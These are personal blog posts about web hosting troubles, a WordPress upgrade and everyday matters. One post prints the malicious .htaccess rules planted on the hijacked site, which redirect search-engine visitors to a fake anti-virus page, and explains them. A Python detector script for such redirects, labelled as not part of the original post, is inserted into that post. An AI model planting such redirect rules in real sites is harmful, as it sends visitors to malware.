Comment Spam

Comment spam seems to be on the rise. So much so that my hosting service completely removed this site to avoid hurting other shared hosting instances.

I was forced to disable comments on posts older than 30 days and on the 2 pages in this blog. It’s a shame, but I wanted the blog to be back up.

Trying Anonymous Comments

To avoid comment spam I’ve previously disallowed anonymous comments on this blog. I would like to see if allowing anonymous comments can work without this blog filling up with huge amounts of spam.

I still prefer that users register and comment, but now you can just blurt out whatever it is on your mind without revealing who you are.

First DreamHost Let Down

Yesterday the blog went offline for about 12 hours. It started with an “Internal Server Error” around 11am Israel time. I was about to comment on one of my posts when it happened. I immediately opened a ticket with DreamHost’s ticket system and was happy to see it being treated promptly – it moved from “unverified” to “verified” to “resolved.”

But the issue was not resolved – the website was still down so I opened another ticket, this time telling them that it’s not OK to set the status of a ticket to “resolved” if the website is still down. What I got in return were offers on how to improve the speed of my blog. Considering that it serves 7 readers, I told them this could hardly be the reason. And I haven’t changed the code in a while, so it’s not supposed to break just like that. I still tried what they offered (disabling WordPress plugins) which of course didn’t help.

So I replied to their email and after 12 hours someone at DreamHost’s support (thanks, Jason) decided to actually look into the issue, agreed with me that the problem was on their end and fixed it.

I hope it’s a one-time thing and not an indication of things to come. It’s a real hassle to switch hosts and I wouldn’t want to do it again.

This Blog Is Now Hosted On DreamHost

Over the weekend I moved this blog to DreamHost. They have a deal where you pay less than 10 USD for the first year of hosting and they seem pretty decent. My previous host, IX Web Hosting, really sucked and the blog was hijacked thanks to their stupidity, even during my trip. I hope that I won’t have to worry about stuff like that anymore.

This Blog Was Hijacked. Shame On IX Web Hosting

Yesterday my brother called me up to let me know that when clicking a link in Google Reader to get to this blog, a malicious website appears instead of the blog. I tried it myself and he was right. The strange thing was that if you tried to enter the address yourself it worked but only if you clicked a link inside Google Reader you would get to the malicious website.

I tried looking for what could have gone wrong. As I couldn’t find anything, I assumed maybe some kind of DNS poisoning occurred, that the solution is out of my reach and that if I wait it out a little bit everything will be back to normal.

So today I checked again and the problem still persisted. I decided to look further into things. Remembering an email message I got from my host, IX Web Hosting, I looked it up. Here it is:

Dear Amit,

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our clients’ websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting
http://www.ixwebhosting.com

When I first got this message I thought it was a hoax. Considering that the computers I use to access my website all have Linux installed, “blaming” me for having the infamous Anti-Virus 2009 (which is a relatively new and very aggressive virus) on my computers is simply wrong, being impossible and all. So I ignored the message but still kept it (I thought about contacting IX Web Hosting to ask whether this was real but just forgot about it.)

Reading the message from IX Web Hosting again, though, got me to check my .htaccess file. And indeed the file contained the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]

These lines mean that if you get to this website from any of the well-known search engines (that is, if the Referer header your browser sends matches one of the patterns) you will be redirected to the address at the last line (I changed the IP address intentionally.) Once I deleted the file from the website’s root directory everything was back to normal. Now I wanted to know how long my blog had been hijacked. My Google Analytics account revealed the answer: my search engine sources dropped to almost zero around December 14th (about a month ago.)
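
A check for this kind of hijack, as an added example that is not part of the original post: it scans .htaccess text for a RewriteRule that sends visitors to another host only when a Referer condition matched. The function name and the `own_hosts` parameter are assumptions, the first sample is abridged from the lines quoted above, and the second sample is constructed.

```python
import re

# Abridged from the .htaccess lines quoted in the post (IP already altered there).
HIJACKED = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]
"""

# Constructed sample: a typical permalink block, which must not be flagged.
CLEAN = """RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target, referer_patterns) for each RewriteRule that
    points at another host and is guarded by a Referer condition."""
    findings, pending = [], []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # skip comments
        cond = COND.match(line)
        if cond:
            # Conditions accumulate until the next RewriteRule consumes them.
            pending.append((cond.group(1), cond.group(2)))
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        target = rule.group(2)
        referers = [p for var, p in pending if "HTTP_REFERER" in var.upper()]
        pending = []
        # An absolute http(s) substitution means the visitor leaves the site.
        host = re.match(r"(?i)https?://([^/:?#]+)", target)
        if referers and host and host.group(1).lower() not in own_hosts:
            findings.append((no, target, referers))
    return findings

if __name__ == "__main__":
    for name, text in (("hijacked", HIJACKED), ("clean", CLEAN)):
        print(name, find_referer_redirects(text))
```

Pass the site's own host names in `own_hosts` so that legitimate redirects to the canonical domain are not reported.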

Digging further, I found this post on the IX Web Hosting Warning blog. The writer of the post seems to think, like me, that IX Web Hosting are simply trying to shift the blame to the customers, which is a big shame.

Up until today I was generally happy with IX Web Hosting. I almost never had any problems with the website and whenever I needed support they answered quickly and resolved any issues I had. But reading through the IX Web Hosting Warning blog made me want to switch hosts (again.) I guess I’ll do that when I’m back from my trip and hope for the best until then. I just can’t be bothered right now with switching hosts.

This Is An Upgraded Blog

Finally I took the time and courage to update my blog’s software. It is now running WordPress 2.6.3, the latest and greatest from the good people at WordPress.org. To upgrade the blog I first had to convert the database to a utf8_unicode_ci collation. It was already Unicode, but the collation wasn’t set right. That was frightening stuff by itself, since these kinds of changes can convert all my Hebrew posts to common gibberish. Naturally I tested this on my home copy of the blog and had everything backed up beforehand, but still…

The upgrade process went very smoothly and lasted for about 15 minutes (I doubt any of the 6 readers of this blog saw the “I’m upgrading” message I put on the front page). I chose the extended upgrade instructions which include the scary step of deleting almost everything from the server. But it’s the cleaner way to go. I was pleasantly surprised to learn that WordPress now supports “Unicode connections” (or whatever the formal name is) to the database so I don’t need to hack the wp-db.php file like I used to before following upgrades.

The reason for the upgrade is my upcoming trip. I would like to use the blog to post updates and pictures from the trip. I still need to choose a solution for posting pictures. There are many to choose from.

Hebrew is still aligned to the left. I’ll get to that soon. Now… let’s see if this post goes through :)

Next Week I’m In Eilat

Next week I’m in Eilat on vacation, so this blog will probably not be updated at least until February 3rd. All six readers of this blog are welcome to check for updates after that time.

An Apology To One Of This Blog’s Readers

Two days ago I was at a party. Even before I went I was informed by the party’s organizer that her friend, who reads my blog, will be there. I always think of the readers of this blog as a collection of people I know, so learning about this “unknown” reader was exciting.

At the party I was introduced to this girl (who also played the guitar during the party. Very cool) and she said “I’m a fan of your blog.” I should have just said “thanks” but I was completely out of words. After running the options through my head I said something I thought about that day. I said: “Now I know all the readers of the blog.” That thought made me smile when I thought about it during the day, but I think maybe I came out a cocky asshole by saying what I said.

So this is an apology to this very nice reader. I’m sorry and thanks a lot. You gave me a great compliment, which made me very happy.

p.s.

From now on I will refer to you as “all 6 readers of this blog”